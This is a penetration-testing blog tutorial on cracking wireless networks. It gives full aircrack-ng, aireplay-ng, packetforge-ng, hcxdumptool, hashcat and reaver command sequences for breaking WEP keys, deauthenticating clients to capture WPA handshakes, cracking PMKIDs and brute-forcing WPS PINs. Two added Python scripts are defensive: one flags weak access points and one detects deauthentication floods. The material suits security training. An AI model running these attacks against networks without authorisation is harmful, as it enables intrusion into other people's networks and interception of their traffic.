Attacking Wireless network - WiFi Hacking

Yara AlHumaidan (0xy37)
7 min read · Sep 26, 2021


Before starting, let's cover some basics:

Wired Equivalent Privacy (WEP)

WEP was developed for wireless networks and was supposed to offer the same security level as a wired network; however, it has many well-known security weaknesses.

Wi-Fi Protected Access (WPA/WPA2)

WPA/WPA2 implements all mandatory features from 802.11i and provides a significant security improvement over WEP. The most important architectural change is the data encryption algorithm: in WPA2, the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) uses the Advanced Encryption Standard (AES).

Wi-Fi Protected Setup (WPS)

WPS stands for Wi-Fi Protected Setup. It is a wireless network security standard that tries to make connecting devices (such as cameras) to a router faster and easier. WPS works only on wireless networks secured with a WPA Personal or WPA2 Personal passphrase.

Phase 1 — Discovery (Wireless Reconnaissance)

The discovery phase for Wi-Fi can be carried out with several tools (use whichever tool you prefer):

Airgraph-ng

Place your wireless card into monitor mode.

airmon-ng start <interface> <AP channel>

Run an Airodump capture for an hour or more, saving the capture to disk.

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>

There are two types of diagrams CAPR/CPG to generate:

  • CAPR (Client to AP Relationship)
  • CPG (Common probe graph)

Usage:

sudo airgraph-ng -i <csv filename> -g <CAPR/CPG> -o <output filename>.png

root@kali:~# sudo airgraph-ng -i cap-the-zone-01.csv -g CPG -o the-zone.png
**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating your Graph using, dump-01.csv and writing to, capr.png
Depending on your system this can take a bit. Please standby.....

  • -o: output image, e.g. Image.png
  • -i: the Airodump-ng CSV file (not the pcap)
  • -g: graph type, either CAPR (Client to AP Relationship) or CPG (Common probe graph)

Open the image file:

root@kali:~# eog thezone-CAPR.png
Airgraph-ng generated graph
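The CSV that airgraph-ng consumes can also be parsed directly. As an added example that is not part of the original post, the script below reads a constructed sample in the layout airodump-ng writes to <capture>-01.csv and lists every AP still on WEP or open authentication together with the clients associated to it, which is exactly what you want to hand the network owner after the discovery phase; the MACs, ESSIDs and timestamps are made up.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <capture>-01.csv
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2021-09-26 10:00:01, 2021-09-26 10:05:01,  6,  54, WEP, WEP, , -40, 120, 300, 0.  0.  0.  0, 6, LabWEP, 
AA:BB:CC:DD:EE:FF, 2021-09-26 10:00:02, 2021-09-26 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 200, 0, 0.  0.  0.  0, 9, CorpGuest, 
12:34:56:78:9A:BC, 2021-09-26 10:00:03, 2021-09-26 10:04:59,  1,  54, OPN, , , -70, 80, 0, 0.  0.  0.  0, 8, FreeWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2021-09-26 10:00:10, 2021-09-26 10:04:50, -60, 45, 00:11:22:33:44:55, LabWEP
DE:AD:BE:EF:00:01, 2021-09-26 10:00:12, 2021-09-26 10:04:55, -62, 12, AA:BB:CC:DD:EE:FF, CorpGuest
CA:FE:00:00:00:02, 2021-09-26 10:00:15, 2021-09-26 10:04:58, -65, 3, (not associated), FreeWifi
"""

WEAK_PRIVACY = ("WEP", "OPN")   # Privacy values that mean no real protection

def parse_airodump_csv(text):
    """Split the export into its AP table and station table (lists of dicts)."""
    ap_rows, sta_rows, header, target = [], [], None, None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:                         # blank line ends the current table
            header = None
        elif row[0] == "BSSID":
            header, target = row, ap_rows
        elif row[0] == "Station MAC":
            header, target = row, sta_rows
        elif header is not None:
            # rows carry a trailing empty field; zip() drops the surplus
            target.append({k.strip(): v.strip() for k, v in zip(header, row)})
    return ap_rows, sta_rows

def weak_aps(text):
    """Return {bssid: (essid, privacy, [client MACs])} for WEP and open APs."""
    aps, stations = parse_airodump_csv(text)
    found = {ap["BSSID"]: (ap["ESSID"], ap["Privacy"], [])
             for ap in aps if any(w in ap["Privacy"].split() for w in WEAK_PRIVACY)}
    for sta in stations:
        if sta["BSSID"] in found:           # associated client of a weak AP
            found[sta["BSSID"]][2].append(sta["Station MAC"])
    return found

if __name__ == "__main__":
    for bssid, (essid, priv, clients) in weak_aps(SAMPLE_CSV).items():
        print(f"{bssid}  {essid:<12} {priv:<4} clients={clients}")
```

Point it at the real file with `weak_aps(open("capture-01.csv").read())`; ESSIDs containing commas are not handled because airodump-ng does not quote them.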

Kismet — Highly recommended

Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.

The tool is installed in Kali and Parrot OS by default.

Usage:

root@kali:~# kismet -c <interface>
Kismet tool

Phase 2 - Start the attack

After gathering enough information about the target wireless network, it is time to attack it.

Attacking WEP

Exploiting WEP via connected clients

  • ARP request replay attack — (Most reliable attack)

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Start an Airodump-ng capture filtering on the AP channel and BSSID, saving the file to disk:

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>

The --ivs flag makes airodump-ng store only the initialization vectors instead of the full packets:

airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> --ivs <interface>

Conduct a fake authentication attack against the AP:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Launch the ARP request replay attack:

aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>

Deauthenticate the connected client to force new IV generation by the AP:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Once a significant number of IVs have been captured (or even while the capture is still running), run Aircrack-ng against the Airodump-ng capture:

aircrack-ng -0 -z <capture>

Exploiting WEP with no connected clients

Fragmentation Attack/KoreK chopchop attack

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:

airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>

Run the fake authentication with a re-association timing of 6000 seconds so that the association does not time out:

aireplay-ng -1 6000 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):

aireplay-ng -4 -b <AP MAC> -h <Your MAC> <interface>
aireplay-ng -5 -b <AP MAC> -h <Your MAC> <interface>

Either attack writes the recovered keystream (PRGA) to an .xor file; with those 1500 bytes you can now build a packet using packetforge-ng.

Craft an ARP request packet using packetforge-ng:

packetforge-ng -0 -a <AP MAC> -h <Your MAC> -k <Dest IP> -l <Source IP> -y <xor file> -w <output file>

  • -0: generate an ARP request packet
  • -a: the AP MAC address
  • -h: the source MAC address (usually yours)
  • -k: the destination IP, i.e. in ARP, "Who has this IP"
  • -l: the source IP, i.e. in ARP, "Tell this IP"
  • -y: the PRGA (.xor) filename
  • -w: the filename to save the packet to

Inject the packet into the network using attack 2, the interactive packet replay attack:

aireplay-ng -2 -r <packet filename> <interface>

Finally, crack the WEP key using Aircrack-ng:

aircrack-ng <capture>

Attacking WPA/WPA2

  • Place the wireless card into monitor mode on the AP channel:
airmon-ng start <interface> <AP channel>
  • Start an Airodump-ng capture filtered on the AP channel and BSSID:
airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>
  • Deauthenticate a connected client so that it reconnects and completes the 4-way handshake:
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

The airodump-ng window should now show that a handshake for the targeted BSSID has been captured.

  • Crack the WPA passphrase with Aircrack-ng and a wordlist:
aircrack-ng -w <wordlist> <capture>
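The deauthentication step used here (and earlier in the WEP ARP replay attack) is also what a wireless IDS watches for, since a genuine AP rarely emits a burst of deauth or disassoc frames. As an added example that is not from the original post, the detector below parses raw 802.11 management frames, groups deauth/disassoc frames by BSSID and alerts when a burst crosses a threshold inside a one-second window; the frames are constructed in memory for the test and never transmitted, and the addresses, threshold and window are assumptions.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC, BEACON = 12, 10, 8   # 802.11 management frame subtypes
def _mac(s): return bytes.fromhex(s.replace(":", ""))

def build_mgmt_frame(subtype, dst, src, bssid, reason=7):
    """Constructed frame: frame control, duration, 3 addresses, seq ctrl, reason code."""
    fc = subtype << 4                   # protocol version 0, type 0 (management)
    return (struct.pack("<HH", fc, 0) + _mac(dst) + _mac(src) + _mac(bssid)
            + struct.pack("<HH", 0, reason))

def parse_frame(raw):
    """Return (subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(raw) < 26:
        return None
    fc = struct.unpack_from("<H", raw, 0)[0]
    if (fc >> 2) & 0x3 != 0:            # type bits: only management frames matter here
        return None
    mac = lambda off: ":".join(f"{b:02x}" for b in raw[off:off + 6])
    return (fc >> 4) & 0xF, mac(4), mac(10), mac(16), struct.unpack_from("<H", raw, 24)[0]

def detect_deauth_flood(frames, threshold=10, window=1.0):
    """frames: (timestamp_s, raw) pairs. Flag a BSSID with >= threshold
    deauth/disassoc frames inside any window-second span; return {bssid: peak}."""
    stamps = defaultdict(list)
    for ts, raw in frames:
        p = parse_frame(raw)
        if p and p[0] in (DEAUTH, DISASSOC):
            stamps[p[3]].append(ts)      # key on BSSID (address 3)
    alerts = {}
    for bssid, ts_list in stamps.items():
        ts_list.sort()
        peak = start = 0
        for end, t in enumerate(ts_list):       # sliding window over sorted times
            while t - ts_list[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def sample_frames():
    """Constructed traffic: 15-frame broadcast deauth burst from AP1, routine
    beacons (dummy body) from both APs, one legitimate deauth from AP2."""
    ap1, ap2, bcast = "aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55", "ff:ff:ff:ff:ff:ff"
    frames = [(i * 0.05, build_mgmt_frame(DEAUTH, bcast, ap1, ap1)) for i in range(15)]
    frames += [(i * 0.1, build_mgmt_frame(BEACON, bcast, ap, ap)) for i in range(20) for ap in (ap1, ap2)]
    frames.append((5.0, build_mgmt_frame(DEAUTH, "11:22:33:44:55:66", ap2, ap2, reason=3)))
    return frames
```

`detect_deauth_flood(sample_frames())` reports only AP1; on real traffic, feed it frames read from a monitor-mode pcap (after stripping the radiotap header) with their capture timestamps.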

PMKID Hashcat Attack

  • Download hcxdumptool:
git clone https://github.com/ZerBea/hcxdumptool.git
  • Install the dependencies and build it:
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
cd hcxdumptool
make
make install
cd ..
  • Download and build hcxtools:
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd ..
  • Start monitor mode:
airmon-ng check kill
airmon-ng start <interface>
  • Use hcxdumptool to capture PMKIDs from nearby networks:
hcxdumptool -i <interface> -o output.pcapng --enable_status=1
  • Run hcxpcaptool to convert the captured pcapng into the hash format accepted by hashcat (the sample run below uses test.pcapng):
./hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800
  • Crack the PMKID hashes with hashcat (mode 16800) and a wordlist:
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

Attacking WPS

Access points with WPS enabled are vulnerable to brute-forcing of the WPS PIN. Once the PIN is recovered, you can connect to the access point and also learn its WPA/WPA2 password.

Discover WPS-enabled networks around you:

root@kali:~# airodump-ng wlan0 --manufacturer --uptime --wps

Using wash:

root@kali:~# wash -i <interface name>

Only access points whose Lck column reads No (i.e. WPS is not locked) and whose WPS version is 1 are suitable for the attack.

Exploiting WPS — Pixie dust attack:

  • Using reaver:
reaver -i <interface> -b <MAC_Address_AP> -K
root@kali:~# reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv -L -N -c 1 -K

  • -K: Run the Pixie Dust attack.
  • -c 1: Listen on channel 1.
  • -vv: Verbose output.
  • -L: Ignore locked WPS state.
  • -N: Don't send NACK packets when errors are detected.
  • -d 15: Delay 15 seconds between PIN attempts.
  • -T: Set timeout period to half a second.
  • -r 3:15: After 3 attempts, sleep for 15 seconds.

Other tools you can try:

One last note: this guide is not exhaustive. There are more attacks that can be used against WiFi access points, but the ones covered above are the most common and give you a strong foundation in WiFi hacking.

Written by Yara AlHumaidan (0xy37)

Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP
